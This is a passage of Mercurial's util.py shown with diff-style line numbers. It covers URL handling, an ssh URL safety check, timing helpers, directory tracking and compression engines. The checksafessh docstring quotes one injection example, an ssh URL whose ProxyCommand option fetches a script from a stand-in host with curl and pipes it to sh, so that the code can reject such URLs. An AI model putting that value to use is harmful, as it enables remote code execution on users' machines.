2762 2775 if self.user:
2763 2776 s += urlreq.quote(self.user, safe=self._safechars)
2764 2777 if self.passwd:
2765 2778 s += ':' + urlreq.quote(self.passwd, safe=self._safechars)
2766 2779 if self.user or self.passwd:
2767 2780 s += '@'
2768 2781 if self.host:
2769 2782 if not (self.host.startswith('[') and self.host.endswith(']')):
2770 2783 s += urlreq.quote(self.host)
2771 2784 else:
2772 2785 s += self.host
2773 2786 if self.port:
2774 2787 s += ':' + urlreq.quote(self.port)
2775 2788 if self.host:
2776 2789 s += '/'
2777 2790 if self.path:
2778 2791 # TODO: similar to the query string, we should not unescape the
2779 2792 # path when we store it, the path might contain '%2f' = '/',
2780 2793 # which we should *not* escape.
2781 2794 s += urlreq.quote(self.path, safe=self._safepchars)
2782 2795 if self.query:
2783 2796 # we store the query in escaped form.
2784 2797 s += '?' + self.query
2785 2798 if self.fragment is not None:
2786 2799 s += '#' + urlreq.quote(self.fragment, safe=self._safepchars)
2787 2800 return s
2788 2801
2789 2802 __str__ = encoding.strmethod(__bytes__)
2790 2803
2791 2804 def authinfo(self):
2792 2805 user, passwd = self.user, self.passwd
2793 2806 try:
2794 2807 self.user, self.passwd = None, None
2795 2808 s = bytes(self)
2796 2809 finally:
2797 2810 self.user, self.passwd = user, passwd
2798 2811 if not self.user:
2799 2812 return (s, None)
2800 2813 # authinfo[1] is passed to urllib2 password manager, and its
2801 2814 # URIs must not contain credentials. The host is passed in the
2802 2815 # URIs list because Python < 2.4.3 uses only that to search for
2803 2816 # a password.
2804 2817 return (s, (None, (s, self.host),
2805 2818 self.user, self.passwd or ''))
2806 2819
2807 2820 def isabs(self):
2808 2821 if self.scheme and self.scheme != 'file':
2809 2822 return True # remote URL
2810 2823 if hasdriveletter(self.path):
2811 2824 return True # absolute for our purposes - can't be joined()
2812 2825 if self.path.startswith(br'\\'):
2813 2826 return True # Windows UNC path
2814 2827 if self.path.startswith('/'):
2815 2828 return True # POSIX-style
2816 2829 return False
2817 2830
2818 2831 def localpath(self):
2819 2832 if self.scheme == 'file' or self.scheme == 'bundle':
2820 2833 path = self.path or '/'
2821 2834 # For Windows, we need to promote hosts containing drive
2822 2835 # letters to paths with drive letters.
2823 2836 if hasdriveletter(self._hostport):
2824 2837 path = self._hostport + '/' + self.path
2825 2838 elif (self.host is not None and self.path
2826 2839 and not hasdriveletter(path)):
2827 2840 path = '/' + path
2828 2841 return path
2829 2842 return self._origpath
2830 2843
2831 2844 def islocal(self):
2832 2845 '''whether localpath will return something that posixfile can open'''
2833 2846 return (not self.scheme or self.scheme == 'file'
2834 2847 or self.scheme == 'bundle')
2835 2848
2836 2849 def hasscheme(path):
2837 2850 return bool(url(path).scheme)
2838 2851
2839 2852 def hasdriveletter(path):
2840 2853 return path and path[1:2] == ':' and path[0:1].isalpha()
2841 2854
2842 2855 def urllocalpath(path):
2843 2856 return url(path, parsequery=False, parsefragment=False).localpath()
2844 2857
2845 2858 def checksafessh(path):
2846 2859 """check if a path / url is a potentially unsafe ssh exploit (SEC)
2847 2860
2848 2861 This is a sanity check for ssh urls. ssh will parse the first item as
2849 2862 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
2850 2863 Let's prevent these potentially exploited urls entirely and warn the
2851 2864 user.
2852 2865
2853 2866 Raises an error.Abort when the url is unsafe.
2854 2867 """
2855 2868 path = urlreq.unquote(path)
2856 2869 if path.startswith('ssh://-') or path.startswith('svn+ssh://-'):
2857 2870 raise error.Abort(_('potentially unsafe url: %r') %
2858 2871 (pycompat.bytestr(path),))
2859 2872
2860 2873 def hidepassword(u):
2861 2874 '''hide user credential in a url string'''
2862 2875 u = url(u)
2863 2876 if u.passwd:
2864 2877 u.passwd = '***'
2865 2878 return bytes(u)
2866 2879
2867 2880 def removeauth(u):
2868 2881 '''remove all authentication information from a url string'''
2869 2882 u = url(u)
2870 2883 u.user = u.passwd = None
2871 2884 return bytes(u)
2872 2885
2873 2886 timecount = unitcountfn(
2874 2887 (1, 1e3, _('%.0f s')),
2875 2888 (100, 1, _('%.1f s')),
2876 2889 (10, 1, _('%.2f s')),
2877 2890 (1, 1, _('%.3f s')),
2878 2891 (100, 0.001, _('%.1f ms')),
2879 2892 (10, 0.001, _('%.2f ms')),
2880 2893 (1, 0.001, _('%.3f ms')),
2881 2894 (100, 0.000001, _('%.1f us')),
2882 2895 (10, 0.000001, _('%.2f us')),
2883 2896 (1, 0.000001, _('%.3f us')),
2884 2897 (100, 0.000000001, _('%.1f ns')),
2885 2898 (10, 0.000000001, _('%.2f ns')),
2886 2899 (1, 0.000000001, _('%.3f ns')),
2887 2900 )
2888 2901
2889 2902 @attr.s
2890 2903 class timedcmstats(object):
2891 2904 """Stats information produced by the timedcm context manager on entering."""
2892 2905
2893 2906 # the starting value of the timer as a float (meaning and resulution is
2894 2907 # platform dependent, see util.timer)
2895 2908 start = attr.ib(default=attr.Factory(lambda: timer()))
2896 2909 # the number of seconds as a floating point value; starts at 0, updated when
2897 2910 # the context is exited.
2898 2911 elapsed = attr.ib(default=0)
2899 2912 # the number of nested timedcm context managers.
2900 2913 level = attr.ib(default=1)
2901 2914
2902 2915 def __bytes__(self):
2903 2916 return timecount(self.elapsed) if self.elapsed else '<unknown>'
2904 2917
2905 2918 __str__ = encoding.strmethod(__bytes__)
2906 2919
2907 2920 @contextlib.contextmanager
2908 2921 def timedcm(whencefmt, *whenceargs):
2909 2922 """A context manager that produces timing information for a given context.
2910 2923
2911 2924 On entering a timedcmstats instance is produced.
2912 2925
2913 2926 This context manager is reentrant.
2914 2927
2915 2928 """
2916 2929 # track nested context managers
2917 2930 timedcm._nested += 1
2918 2931 timing_stats = timedcmstats(level=timedcm._nested)
2919 2932 try:
2920 2933 with tracing.log(whencefmt, *whenceargs):
2921 2934 yield timing_stats
2922 2935 finally:
2923 2936 timing_stats.elapsed = timer() - timing_stats.start
2924 2937 timedcm._nested -= 1
2925 2938
2926 2939 timedcm._nested = 0
2927 2940
2928 2941 def timed(func):
2929 2942 '''Report the execution time of a function call to stderr.
2930 2943
2931 2944 During development, use as a decorator when you need to measure
2932 2945 the cost of a function, e.g. as follows:
2933 2946
2934 2947 @util.timed
2935 2948 def foo(a, b, c):
2936 2949 pass
2937 2950 '''
2938 2951
2939 2952 def wrapper(*args, **kwargs):
2940 2953 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
2941 2954 result = func(*args, **kwargs)
2942 2955 stderr = procutil.stderr
2943 2956 stderr.write('%s%s: %s\n' % (
2944 2957 ' ' * time_stats.level * 2, pycompat.bytestr(func.__name__),
2945 2958 time_stats))
2946 2959 return result
2947 2960 return wrapper
2948 2961
2949 2962 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
2950 2963 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
2951 2964
2952 2965 def sizetoint(s):
2953 2966 '''Convert a space specifier to a byte count.
2954 2967
2955 2968 >>> sizetoint(b'30')
2956 2969 30
2957 2970 >>> sizetoint(b'2.2kb')
2958 2971 2252
2959 2972 >>> sizetoint(b'6M')
2960 2973 6291456
2961 2974 '''
2962 2975 t = s.strip().lower()
2963 2976 try:
2964 2977 for k, u in _sizeunits:
2965 2978 if t.endswith(k):
2966 2979 return int(float(t[:-len(k)]) * u)
2967 2980 return int(t)
2968 2981 except ValueError:
2969 2982 raise error.ParseError(_("couldn't parse size: %s") % s)
2970 2983
2971 2984 class hooks(object):
2972 2985 '''A collection of hook functions that can be used to extend a
2973 2986 function's behavior. Hooks are called in lexicographic order,
2974 2987 based on the names of their sources.'''
2975 2988
2976 2989 def __init__(self):
2977 2990 self._hooks = []
2978 2991
2979 2992 def add(self, source, hook):
2980 2993 self._hooks.append((source, hook))
2981 2994
2982 2995 def __call__(self, *args):
2983 2996 self._hooks.sort(key=lambda x: x[0])
2984 2997 results = []
2985 2998 for source, hook in self._hooks:
2986 2999 results.append(hook(*args))
2987 3000 return results
2988 3001
2989 3002 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
2990 3003 '''Yields lines for a nicely formatted stacktrace.
2991 3004 Skips the 'skip' last entries, then return the last 'depth' entries.
2992 3005 Each file+linenumber is formatted according to fileline.
2993 3006 Each line is formatted according to line.
2994 3007 If line is None, it yields:
2995 3008 length of longest filepath+line number,
2996 3009 filepath+linenumber,
2997 3010 function
2998 3011
2999 3012 Not be used in production code but very convenient while developing.
3000 3013 '''
3001 3014 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3002 3015 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3003 3016 ][-depth:]
3004 3017 if entries:
3005 3018 fnmax = max(len(entry[0]) for entry in entries)
3006 3019 for fnln, func in entries:
3007 3020 if line is None:
3008 3021 yield (fnmax, fnln, func)
3009 3022 else:
3010 3023 yield line % (fnmax, fnln, func)
3011 3024
3012 3025 def debugstacktrace(msg='stacktrace', skip=0,
3013 3026 f=procutil.stderr, otherf=procutil.stdout, depth=0):
3014 3027 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3015 3028 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3016 3029 By default it will flush stdout first.
3017 3030 It can be used everywhere and intentionally does not require an ui object.
3018 3031 Not be used in production code but very convenient while developing.
3019 3032 '''
3020 3033 if otherf:
3021 3034 otherf.flush()
3022 3035 f.write('%s at:\n' % msg.rstrip())
3023 3036 for line in getstackframes(skip + 1, depth=depth):
3024 3037 f.write(line)
3025 3038 f.flush()
3026 3039
3027 3040 class dirs(object):
3028 3041 '''a multiset of directory names from a dirstate or manifest'''
3029 3042
3030 3043 def __init__(self, map, skip=None):
3031 3044 self._dirs = {}
3032 3045 addpath = self.addpath
3033 3046 if safehasattr(map, 'iteritems') and skip is not None:
3034 3047 for f, s in map.iteritems():
3035 3048 if s[0] != skip:
3036 3049 addpath(f)
3037 3050 else:
3038 3051 for f in map:
3039 3052 addpath(f)
3040 3053
3041 3054 def addpath(self, path):
3042 3055 dirs = self._dirs
3043 3056 for base in finddirs(path):
3044 3057 if base in dirs:
3045 3058 dirs[base] += 1
3046 3059 return
3047 3060 dirs[base] = 1
3048 3061
3049 3062 def delpath(self, path):
3050 3063 dirs = self._dirs
3051 3064 for base in finddirs(path):
3052 3065 if dirs[base] > 1:
3053 3066 dirs[base] -= 1
3054 3067 return
3055 3068 del dirs[base]
3056 3069
3057 3070 def __iter__(self):
3058 3071 return iter(self._dirs)
3059 3072
3060 3073 def __contains__(self, d):
3061 3074 return d in self._dirs
3062 3075
3063 3076 if safehasattr(parsers, 'dirs'):
3064 3077 dirs = parsers.dirs
3065 3078
3066 3079 def finddirs(path):
3067 3080 pos = path.rfind('/')
3068 3081 while pos != -1:
3069 3082 yield path[:pos]
3070 3083 pos = path.rfind('/', 0, pos)
3071 3084
3072 3085 # compression code
3073 3086
3074 3087 SERVERROLE = 'server'
3075 3088 CLIENTROLE = 'client'
3076 3089
3077 3090 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3078 3091 (u'name', u'serverpriority',
3079 3092 u'clientpriority'))
3080 3093
3081 3094 class compressormanager(object):
3082 3095 """Holds registrations of various compression engines.
3083 3096
3084 3097 This class essentially abstracts the differences between compression
3085 3098 engines to allow new compression formats to be added easily, possibly from
3086 3099 extensions.
3087 3100
3088 3101 Compressors are registered against the global instance by calling its
3089 3102 ``register()`` method.
3090 3103 """
3091 3104 def __init__(self):
3092 3105 self._engines = {}
3093 3106 # Bundle spec human name to engine name.
3094 3107 self._bundlenames = {}
3095 3108 # Internal bundle identifier to engine name.
3096 3109 self._bundletypes = {}
3097 3110 # Revlog header to engine name.
3098 3111 self._revlogheaders = {}
3099 3112 # Wire proto identifier to engine name.
3100 3113 self._wiretypes = {}
3101 3114
3102 3115 def __getitem__(self, key):
3103 3116 return self._engines[key]
3104 3117
3105 3118 def __contains__(self, key):
3106 3119 return key in self._engines
3107 3120
3108 3121 def __iter__(self):
3109 3122 return iter(self._engines.keys())
3110 3123
3111 3124 def register(self, engine):
3112 3125 """Register a compression engine with the manager.
3113 3126
3114 3127 The argument must be a ``compressionengine`` instance.
3115 3128 """
3116 3129 if not isinstance(engine, compressionengine):
3117 3130 raise ValueError(_('argument must be a compressionengine'))
3118 3131
3119 3132 name = engine.name()
3120 3133
3121 3134 if name in self._engines:
3122 3135 raise error.Abort(_('compression engine %s already registered') %
3123 3136 name)
3124 3137
3125 3138 bundleinfo = engine.bundletype()
3126 3139 if bundleinfo:
3127 3140 bundlename, bundletype = bundleinfo
3128 3141
3129 3142 if bundlename in self._bundlenames:
3130 3143 raise error.Abort(_('bundle name %s already registered') %
3131 3144 bundlename)
3132 3145 if bundletype in self._bundletypes:
3133 3146 raise error.Abort(_('bundle type %s already registered by %s') %
3134 3147 (bundletype, self._bundletypes[bundletype]))
3135 3148
3136 3149 # No external facing name declared.
3137 3150 if bundlename:
3138 3151 self._bundlenames[bundlename] = name
3139 3152
3140 3153 self._bundletypes[bundletype] = name
3141 3154
3142 3155 wiresupport = engine.wireprotosupport()
3143 3156 if wiresupport:
3144 3157 wiretype = wiresupport.name
3145 3158 if wiretype in self._wiretypes:
3146 3159 raise error.Abort(_('wire protocol compression %s already '
3147 3160 'registered by %s') %
3148 3161 (wiretype, self._wiretypes[wiretype]))
3149 3162
3150 3163 self._wiretypes[wiretype] = name
3151 3164
3152 3165 revlogheader = engine.revlogheader()
3153 3166 if revlogheader and revlogheader in self._revlogheaders:
3154 3167 raise error.Abort(_('revlog header %s already registered by %s') %
3155 3168 (revlogheader, self._revlogheaders[revlogheader]))
3156 3169
3157 3170 if revlogheader:
3158 3171 self._revlogheaders[revlogheader] = name
3159 3172
3160 3173 self._engines[name] = engine
3161 3174
3162 3175 @property
3163 3176 def supportedbundlenames(self):
3164 3177 return set(self._bundlenames.keys())
3165 3178
3166 3179 @property
3167 3180 def supportedbundletypes(self):
3168 3181 return set(self._bundletypes.keys())
3169 3182
3170 3183 def forbundlename(self, bundlename):
3171 3184 """Obtain a compression engine registered to a bundle name.
3172 3185
3173 3186 Will raise KeyError if the bundle type isn't registered.
3174 3187
3175 3188 Will abort if the engine is known but not available.
3176 3189 """
3177 3190 engine = self._engines[self._bundlenames[bundlename]]
3178 3191 if not engine.available():
3179 3192 raise error.Abort(_('compression engine %s could not be loaded') %
3180 3193 engine.name())
3181 3194 return engine
3182 3195
3183 3196 def forbundletype(self, bundletype):
3184 3197 """Obtain a compression engine registered to a bundle type.
3185 3198
3186 3199 Will raise KeyError if the bundle type isn't registered.
3187 3200
3188 3201 Will abort if the engine is known but not available.
3189 3202 """
3190 3203 engine = self._engines[self._bundletypes[bundletype]]
3191 3204 if not engine.available():
3192 3205 raise error.Abort(_('compression engine %s could not be loaded') %
3193 3206 engine.name())
3194 3207 return engine
3195 3208
3196 3209 def supportedwireengines(self, role, onlyavailable=True):
3197 3210 """Obtain compression engines that support the wire protocol.
3198 3211
3199 3212 Returns a list of engines in prioritized order, most desired first.
3200 3213
3201 3214 If ``onlyavailable`` is set, filter out engines that can't be
3202 3215 loaded.
3203 3216 """
3204 3217 assert role in (SERVERROLE, CLIENTROLE)
3205 3218
3206 3219 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3207 3220
3208 3221 engines = [self._engines[e] for e in self._wiretypes.values()]
3209 3222 if onlyavailable:
3210 3223 engines = [e for e in engines if e.available()]
3211 3224
3212 3225 def getkey(e):
3213 3226 # Sort first by priority, highest first. In case of tie, sort
3214 3227 # alphabetically. This is arbitrary, but ensures output is
3215 3228 # stable.
3216 3229 w = e.wireprotosupport()
3217 3230 return -1 * getattr(w, attr), w.name
3218 3231
3219 3232 return list(sorted(engines, key=getkey))
3220 3233
3221 3234 def forwiretype(self, wiretype):
3222 3235 engine = self._engines[self._wiretypes[wiretype]]
3223 3236 if not engine.available():
3224 3237 raise error.Abort(_('compression engine %s could not be loaded') %
3225 3238 engine.name())
3226 3239 return engine
3227 3240
3228 3241 def forrevlogheader(self, header):
3229 3242 """Obtain a compression engine registered to a revlog header.
3230 3243
3231 3244 Will raise KeyError if the revlog header value isn't registered.
3232 3245 """
3233 3246 return self._engines[self._revlogheaders[header]]
3234 3247
3235 3248 compengines = compressormanager()
3236 3249
3237 3250 class compressionengine(object):
3238 3251 """Base class for compression engines.
3239 3252
3240 3253 Compression engines must implement the interface defined by this class.
3241 3254 """
3242 3255 def name(self):
3243 3256 """Returns the name of the compression engine.
3244 3257
3245 3258 This is the key the engine is registered under.
3246 3259
3247 3260 This method must be implemented.
3248 3261 """
3249 3262 raise NotImplementedError()
3250 3263
3251 3264 def available(self):
3252 3265 """Whether the compression engine is available.
3253 3266
3254 3267 The intent of this method is to allow optional compression engines
3255 3268 that may not be available in all installations (such as engines relying
3256 3269 on C extensions that may not be present).
3257 3270 """
3258 3271 return True
3259 3272
3260 3273 def bundletype(self):
3261 3274 """Describes bundle identifiers for this engine.
3262 3275
3263 3276 If this compression engine isn't supported for bundles, returns None.
3264 3277
3265 3278 If this engine can be used for bundles, returns a 2-tuple of strings of
3266 3279 the user-facing "bundle spec" compression name and an internal
3267 3280 identifier used to denote the compression format within bundles. To
3268 3281 exclude the name from external usage, set the first element to ``None``.
3269 3282
3270 3283 If bundle compression is supported, the class must also implement
3271 3284 ``compressstream`` and `decompressorreader``.
3272 3285
3273 3286 The docstring of this method is used in the help system to tell users
3274 3287 about this engine.
3275 3288 """
3276 3289 return None
3277 3290
3278 3291 def wireprotosupport(self):
3279 3292 """Declare support for this compression format on the wire protocol.
3280 3293
3281 3294 If this compression engine isn't supported for compressing wire
3282 3295 protocol payloads, returns None.
3283 3296
3284 3297 Otherwise, returns ``compenginewireprotosupport`` with the following
3285 3298 fields:
3286 3299
3287 3300 * String format identifier
3288 3301 * Integer priority for the server
3289 3302 * Integer priority for the client
3290 3303
3291 3304 The integer priorities are used to order the advertisement of format
3292 3305 support by server and client. The highest integer is advertised
3293 3306 first. Integers with non-positive values aren't advertised.
3294 3307
3295 3308 The priority values are somewhat arbitrary and only used for default
3296 3309 ordering. The relative order can be changed via config options.
3297 3310
3298 3311 If wire protocol compression is supported, the class must also implement
3299 3312 ``compressstream`` and ``decompressorreader``.
3300 3313 """
3301 3314 return None
3302 3315
3303 3316 def revlogheader(self):
3304 3317 """Header added to revlog chunks that identifies this engine.
3305 3318
3306 3319 If this engine can be used to compress revlogs, this method should
3307 3320 return the bytes used to identify chunks compressed with this engine.
3308 3321 Else, the method should return ``None`` to indicate it does not
3309 3322 participate in revlog compression.
3310 3323 """
3311 3324 return None
3312 3325
3313 3326 def compressstream(self, it, opts=None):
3314 3327 """Compress an iterator of chunks.
3315 3328
3316 3329 The method receives an iterator (ideally a generator) of chunks of
3317 3330 bytes to be compressed. It returns an iterator (ideally a generator)
3318 3331 of bytes of chunks representing the compressed output.
3319 3332
3320 3333 Optionally accepts an argument defining how to perform compression.
3321 3334 Each engine treats this argument differently.
3322 3335 """
3323 3336 raise NotImplementedError()
3324 3337
3325 3338 def decompressorreader(self, fh):
3326 3339 """Perform decompression on a file object.
3327 3340
3328 3341 Argument is an object with a ``read(size)`` method that returns
3329 3342 compressed data. Return value is an object with a ``read(size)`` that
3330 3343 returns uncompressed data.
3331 3344 """
3332 3345 raise NotImplementedError()
3333 3346
3334 3347 def revlogcompressor(self, opts=None):
3335 3348 """Obtain an object that can be used to compress revlog entries.
3336 3349
3337 3350 The object has a ``compress(data)`` method that compresses binary
3338 3351 data. This method returns compressed binary data or ``None`` if
3339 3352 the data could not be compressed (too small, not compressible, etc).
3340 3353 The returned data should have a header uniquely identifying this
3341 3354 compression format so decompression can be routed to this engine.
3342 3355 This header should be identified by the ``revlogheader()`` return
3343 3356 value.
3344 3357
3345 3358 The object has a ``decompress(data)`` method that decompresses
3346 3359 data. The method will only be called if ``data`` begins with
3347 3360 ``revlogheader()``. The method should return the raw, uncompressed
3348 3361 data or raise a ``RevlogError``.
3349 3362
3350 3363 The object is reusable but is not thread safe.
3351 3364 """
3352 3365 raise NotImplementedError()
3353 3366
3354 3367 class _CompressedStreamReader(object):
3355 3368 def __init__(self, fh):
3356 3369 if safehasattr(fh, 'unbufferedread'):
3357 3370 self._reader = fh.unbufferedread
3358 3371 else:
3359 3372 self._reader = fh.read
3360 3373 self._pending = []
3361 3374 self._pos = 0
3362 3375 self._eof = False
3363 3376
3364 3377 def _decompress(self, chunk):
3365 3378 raise NotImplementedError()
3366 3379
3367 3380 def read(self, l):
3368 3381 buf = []
3369 3382 while True:
3370 3383 while self._pending:
3371 3384 if len(self._pending[0]) > l + self._pos:
3372 3385 newbuf = self._pending[0]
3373 3386 buf.append(newbuf[self._pos:self._pos + l])
3374 3387 self._pos += l
3375 3388 return ''.join(buf)
3376 3389
3377 3390 newbuf = self._pending.pop(0)
3378 3391 if self._pos:
3379 3392 buf.append(newbuf[self._pos:])
3380 3393 l -= len(newbuf) - self._pos
3381 3394 else:
3382 3395 buf.append(newbuf)
3383 3396 l -= len(newbuf)
3384 3397 self._pos = 0
3385 3398
3386 3399 if self._eof:
3387 3400 return ''.join(buf)
3388 3401 chunk = self._reader(65536)
3389 3402 self._decompress(chunk)
3390 3403 if not chunk and not self._pending and not self._eof:
3391 3404 # No progress and no new data, bail out
3392 3405 return ''.join(buf)
3393 3406
3394 3407 class _GzipCompressedStreamReader(_CompressedStreamReader):
3395 3408 def __init__(self, fh):
3396 3409 super(_GzipCompressedStreamReader, self).__init__(fh)
3397 3410 self._decompobj = zlib.decompressobj()
3398 3411 def _decompress(self, chunk):
3399 3412 newbuf = self._decompobj.decompress(chunk)
3400 3413 if newbuf:
3401 3414 self._pending.append(newbuf)
3402 3415 d = self._decompobj.copy()
3403 3416 try:
3404 3417 d.decompress('x')
3405 3418 d.flush()
3406 3419 if d.unused_data == 'x':
3407 3420 self._eof = True
3408 3421 except zlib.error:
3409 3422 pass
3410 3423
3411 3424 class _BZ2CompressedStreamReader(_CompressedStreamReader):
3412 3425 def __init__(self, fh):
3413 3426 super(_BZ2CompressedStreamReader, self).__init__(fh)
3414 3427 self._decompobj = bz2.BZ2Decompressor()
3415 3428 def _decompress(self, chunk):
3416 3429 newbuf = self._decompobj.decompress(chunk)
3417 3430 if newbuf:
3418 3431 self._pending.append(newbuf)
3419 3432 try:
3420 3433 while True:
3421 3434 newbuf = self._decompobj.decompress('')
3422 3435 if newbuf:
3423 3436 self._pending.append(newbuf)
3424 3437 else:
3425 3438 break
3426 3439 except EOFError:
3427 3440 self._eof = True
3428 3441
3429 3442 class _TruncatedBZ2CompressedStreamReader(_BZ2CompressedStreamReader):
3430 3443 def __init__(self, fh):
3431 3444 super(_TruncatedBZ2CompressedStreamReader, self).__init__(fh)
3432 3445 newbuf = self._decompobj.decompress('BZ')
3433 3446 if newbuf:
3434 3447 self._pending.append(newbuf)
3435 3448
3436 3449 class _ZstdCompressedStreamReader(_CompressedStreamReader):
3437 3450 def __init__(self, fh, zstd):
3438 3451 super(_ZstdCompressedStreamReader, self).__init__(fh)
3439 3452 self._zstd = zstd
3440 3453 self._decompobj = zstd.ZstdDecompressor().decompressobj()
3441 3454 def _decompress(self, chunk):
3442 3455 newbuf = self._decompobj.decompress(chunk)
3443 3456 if newbuf:
3444 3457 self._pending.append(newbuf)
3445 3458 try:
3446 3459 while True:
3447 3460 newbuf = self._decompobj.decompress('')
3448 3461 if newbuf:
3449 3462 self._pending.append(newbuf)
3450 3463 else:
3451 3464 break
3452 3465 except self._zstd.ZstdError:
3453 3466 self._eof = True
3454 3467
3455 3468 class _zlibengine(compressionengine):
3456 3469 def name(self):
3457 3470 return 'zlib'
3458 3471
3459 3472 def bundletype(self):
3460 3473 """zlib compression using the DEFLATE algorithm.
3461 3474
3462 3475 All Mercurial clients should support this format. The compression
3463 3476 algorithm strikes a reasonable balance between compression ratio
3464 3477 and size.
3465 3478 """
3466 3479 return 'gzip', 'GZ'
3467 3480
3468 3481 def wireprotosupport(self):
3469 3482 return compewireprotosupport('zlib', 20, 20)
3470 3483
3471 3484 def revlogheader(self):
3472 3485 return 'x'
3473 3486
3474 3487 def compressstream(self, it, opts=None):
3475 3488 opts = opts or {}
3476 3489
3477 3490 z = zlib.compressobj(opts.get('level', -1))
3478 3491 for chunk in it:
3479 3492 data = z.compress(chunk)
3480 3493 # Not all calls to compress emit data. It is cheaper to inspect
3481 3494 # here than to feed empty chunks through generator.
3482 3495 if data:
3483 3496 yield data
3484 3497
3485 3498 yield z.flush()
3486 3499
3487 3500 def decompressorreader(self, fh):
3488 3501 return _GzipCompressedStreamReader(fh)
3489 3502
3490 3503 class zlibrevlogcompressor(object):
3491 3504 def compress(self, data):
3492 3505 insize = len(data)
3493 3506 # Caller handles empty input case.
3494 3507 assert insize > 0
3495 3508
3496 3509 if insize < 44:
3497 3510 return None
3498 3511
3499 3512 elif insize <= 1000000:
3500 3513 compressed = zlib.compress(data)
3501 3514 if len(compressed) < insize:
3502 3515 return compressed
3503 3516 return None
3504 3517
3505 3518 # zlib makes an internal copy of the input buffer, doubling
3506 3519 # memory usage for large inputs. So do streaming compression
3507 3520 # on large inputs.
3508 3521 else:
3509 3522 z = zlib.compressobj()
3510 3523 parts = []
3511 3524 pos = 0
3512 3525 while pos < insize:
3513 3526 pos2 = pos + 2**20
3514 3527 parts.append(z.compress(data[pos:pos2]))
3515 3528 pos = pos2
3516 3529 parts.append(z.flush())
3517 3530
3518 3531 if sum(map(len, parts)) < insize:
3519 3532 return ''.join(parts)
3520 3533 return None
3521 3534
3522 3535 def decompress(self, data):
3523 3536 try:
3524 3537 return zlib.decompress(data)
3525 3538 except zlib.error as e:
3526 3539 raise error.RevlogError(_('revlog decompress error: %s') %
3527 3540 stringutil.forcebytestr(e))
3528 3541
3529 3542 def revlogcompressor(self, opts=None):
3530 3543 return self.zlibrevlogcompressor()
3531 3544
3532 3545 compengines.register(_zlibengine())
3533 3546
3534 3547 class _bz2engine(compressionengine):
3535 3548 def name(self):
3536 3549 return 'bz2'
3537 3550
3538 3551 def bundletype(self):
3539 3552 """An algorithm that produces smaller bundles than ``gzip``.
3540 3553
3541 3554 All Mercurial clients should support this format.
3542 3555
3543 3556 This engine will likely produce smaller bundles than ``gzip`` but
3544 3557 will be significantly slower, both during compression and
3545 3558 decompression.
3546 3559
3547 3560 If available, the ``zstd`` engine can yield similar or better
3548 3561 compression at much higher speeds.
3549 3562 """
3550 3563 return 'bzip2', 'BZ'
3551 3564
3552 3565 # We declare a protocol name but don't advertise by default because
3553 3566 # it is slow.
3554 3567 def wireprotosupport(self):
3555 3568 return compewireprotosupport('bzip2', 0, 0)
3556 3569
3557 3570 def compressstream(self, it, opts=None):
3558 3571 opts = opts or {}
3559 3572 z = bz2.BZ2Compressor(opts.get('level', 9))
3560 3573 for chunk in it:
3561 3574 data = z.compress(chunk)
3562 3575 if data:
3563 3576 yield data
3564 3577
3565 3578 yield z.flush()
3566 3579
3567 3580 def decompressorreader(self, fh):
3568 3581 return _BZ2CompressedStreamReader(fh)
3569 3582
3570 3583 compengines.register(_bz2engine())
3571 3584
3572 3585 class _truncatedbz2engine(compressionengine):
3573 3586 def name(self):
3574 3587 return 'bz2truncated'
3575 3588
3576 3589 def bundletype(self):
3577 3590 return None, '_truncatedBZ'
3578 3591
3579 3592 # We don't implement compressstream because it is hackily handled elsewhere.
3580 3593
3581 3594 def decompressorreader(self, fh):
3582 3595 return _TruncatedBZ2CompressedStreamReader(fh)
3583 3596
3584 3597 compengines.register(_truncatedbz2engine())
3585 3598
3586 3599 class _noopengine(compressionengine):
3587 3600 def name(self):
3588 3601 return 'none'
3589 3602
3590 3603 def bundletype(self):
3591 3604 """No compression is performed.
3592 3605
3593 3606 Use this compression engine to explicitly disable compression.
3594 3607 """
3595 3608 return 'none', 'UN'
3596 3609
3597 3610 # Clients always support uncompressed payloads. Servers don't because
3598 3611 # unless you are on a fast network, uncompressed payloads can easily
3599 3612 # saturate your network pipe.
3600 3613 def wireprotosupport(self):
3601 3614 return compewireprotosupport('none', 0, 10)
3602 3615
3603 3616 # We don't implement revlogheader because it is handled specially
3604 3617 # in the revlog class.
3605 3618
3606 3619 def compressstream(self, it, opts=None):
3607 3620 return it
3608 3621
3609 3622 def decompressorreader(self, fh):
3610 3623 return fh
3611 3624
3612 3625 class nooprevlogcompressor(object):
3613 3626 def compress(self, data):
3614 3627 return None
3615 3628
3616 3629 def revlogcompressor(self, opts=None):
3617 3630 return self.nooprevlogcompressor()
3618 3631
3619 3632 compengines.register(_noopengine())
3620 3633
3621 3634 class _zstdengine(compressionengine):
3622 3635 def name(self):
3623 3636 return 'zstd'
3624 3637
3625 3638 @propertycache
3626 3639 def _module(self):
3627 3640 # Not all installs have the zstd module available. So defer importing
3628 3641 # until first access.
3629 3642 try:
3630 3643 from . import zstd
3631 3644 # Force delayed import.
3632 3645 zstd.__version__
3633 3646 return zstd
3634 3647 except ImportError:
3635 3648 return None
3636 3649
3637 3650 def available(self):
3638 3651 return bool(self._module)
3639 3652
3640 3653 def bundletype(self):
3641 3654 """A modern compression algorithm that is fast and highly flexible.
3642 3655
3643 3656 Only supported by Mercurial 4.1 and newer clients.
3644 3657
3645 3658 With the default settings, zstd compression is both faster and yields
3646 3659 better compression than ``gzip``. It also frequently yields better
3647 3660 compression than ``bzip2`` while operating at much higher speeds.
3648 3661
3649 3662 If this engine is available and backwards compatibility is not a
3650 3663 concern, it is likely the best available engine.
3651 3664 """
3652 3665 return 'zstd', 'ZS'
3653 3666
3654 3667 def wireprotosupport(self):
3655 3668 return compewireprotosupport('zstd', 50, 50)
3656 3669
3657 3670 def revlogheader(self):
3658 3671 return '\x28'
3659 3672
3660 3673 def compressstream(self, it, opts=None):
3661 3674 opts = opts or {}
